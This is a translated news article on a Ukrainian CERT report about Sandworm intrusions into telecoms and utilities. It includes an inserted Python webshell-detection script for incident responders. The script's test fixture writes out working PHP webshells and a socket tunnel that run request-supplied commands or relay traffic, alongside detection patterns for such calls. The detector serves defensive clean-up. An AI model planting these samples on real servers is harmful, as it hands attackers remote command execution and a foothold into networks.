Ukrainian CERT describes attacks on critical infrastructure

Ukraine's CERT appears to have headed off attacks on critical infrastructure before they caused damage. The agency has now published its findings.

Pylon of a high-voltage transmission line with a stylised background and the visible words "Cyber Attack".

(Image: vectorfusionart/Shutterstock.com)

This article was originally published in German and has been automatically translated.

Ukraine's CERT (CERT-UA) has described attacks on the country's critical infrastructure. According to its report, the Russian state-linked group Sandworm planned cyber sabotage against almost 20 critical infrastructure (KRITIS) facilities.

Unlike many cyberwar stories from the war between Russia and Ukraine, this one is not about website defacements or DoS/DDoS attacks on ordinary IT systems. These attacks had the potential to cause physical damage, as they targeted critical infrastructure such as the mobile network operator Kyivstar or the fixed-line and Internet provider Ukrtelecom. However, CERT-UA reports no specific damage, and there were no reports of corresponding outages in the general news from Ukraine during the period in question. This suggests that the attacks were either repelled in time or were less critical than the choice of targets implies; presumably a mixture of both.

In its article, CERT-UA describes how it discovered various backdoors, other malware and indications of the attackers' plans while cleaning up compromised machines. For example, the forensic analysts found the Queueseed backdoor (also known as Knuckletouch or Kapeka, in use since 2022) on the infiltrated machines. They also found Linux variants of it, named Biasboat and Loadgrip, on computers used for process automation. In one case the Biasboat sample was evidently built for a different host: its payload was encrypted and bound to a machine ID that the attackers had previously assigned to that target server, so the sample could only be unpacked on the machine it was meant for.

CERT-UA found compromised computers in three "supply chains", i.e. at suppliers whose systems reach into the networks of the actual targets. The attackers had prepared these machines as staging points from which to move into and develop attacks against the companies' networks. On them the analysts found ready-made PHP webshells and PHP tunnels, which give the attackers command execution on, and a relay into, the infiltrated systems. Between March 7 and 15, 2024, CERT-UA notified the affected companies and initiated countermeasures. During the clean-up, the circumstances of the initial infection were established, the malware was removed and analysed, and a timeline of events was reconstructed. Additional security tooling was also deployed, since some of the Linux backdoors had been planted as early as 2023.
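The PHP webshells and tunnels mentioned above are usually the easiest part of such an intrusion to find on disk, because they combine a request parameter with code execution or a raw socket in one short file. The following Python block is an added example of the kind of heuristic sweep an incident responder runs over a web root during clean-up; it is not CERT-UA's tooling and the four PHP files it scans are constructed stand-ins, not samples from the report. The rule set, weights and threshold are assumptions that a real deployment would tune against its own false-positive rate.

```python
"""Heuristic PHP webshell / tunnel sweep (added example, constructed samples)."""
import re

# (pattern, weight, label): presence of each pattern adds its weight once.
RULES = [
    (r"\beval\s*\(", 3, "eval()"),
    (r"\bassert\s*\(", 2, "assert() as code execution"),
    (r"\b(?:system|shell_exec|passthru|exec|popen|proc_open)\s*\(", 3, "command execution"),
    (r"preg_replace\s*\(\s*['\"][^'\"]*/e", 3, "preg_replace /e modifier"),
    (r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", 2, "decoding / obfuscation"),
    (r"\b(?:fsockopen|stream_socket_client|socket_create|socket_connect)\s*\(", 2, "raw socket (tunnel)"),
    (r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[", 1, "request parameter"),
]
COMPILED = [(re.compile(p, re.I), w, label) for p, w, label in RULES]

# Request data and a dangerous sink on the same line is the classic webshell shape.
DANGEROUS = re.compile(
    r"\b(?:eval|assert|system|shell_exec|passthru|exec|popen|proc_open"
    r"|fsockopen|stream_socket_client)\s*\(", re.I)
REQUEST = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[", re.I)
COMBO_WEIGHT = 3

# Constructed sample web root: path -> file contents.
SAMPLE_FILES = {
    "upload/img.php": "<?php if(isset($_POST['c'])){ echo shell_exec($_POST['c']); } ?>",
    "cache/t.php": "<?php @eval(base64_decode($_REQUEST['x'])); ?>",
    "lib/tunnel.php": (
        "<?php\n"
        "$s = fsockopen($_GET['h'], (int)$_GET['p'], $errno, $errstr, 5);\n"
        "fwrite($s, base64_decode($_POST['d']));\n"
        "echo base64_encode(fread($s, 8192));\n"
    ),
    "index.php": "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>",
}


def score_php(source: str) -> tuple[int, list[str]]:
    """Return (score, reasons) for one PHP source text."""
    score, reasons = 0, []
    for regex, weight, label in COMPILED:
        if regex.search(source):
            score += weight
            reasons.append(label)
    for line in source.splitlines():
        if DANGEROUS.search(line) and REQUEST.search(line):
            score += COMBO_WEIGHT
            reasons.append("request data reaches a dangerous call on one line")
            break
    return score, reasons


def scan(files: dict[str, str], threshold: int = 5) -> dict[str, dict]:
    """Score every file; 'flagged' marks those at or above the threshold."""
    results = {}
    for path, source in files.items():
        score, reasons = score_php(source)
        results[path] = {"score": score, "flagged": score >= threshold, "reasons": reasons}
    return results


if __name__ == "__main__":
    for path, info in scan(SAMPLE_FILES).items():
        mark = "FLAG" if info["flagged"] else "ok  "
        print(f"{mark} {info['score']:2d} {path}: {', '.join(info['reasons'])}")
```

Hits from a sweep like this are leads, not verdicts: compare each flagged file against the deployed application's own source or package manifest, check its modification time against the intrusion timeline, and look for the corresponding requests in the web server's access log before deciding what to remove.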

CERT-UA further states that the attackers most likely belong to the Sandworm group. In its assessment, the intrusions into this large number of heating, water and energy utilities were intended to amplify the effect of Russian missile strikes on Ukrainian infrastructure in spring 2024.

The CERT-UA analysis closes with a lengthy list of Indicators of Compromise (IOCs).

(dmk)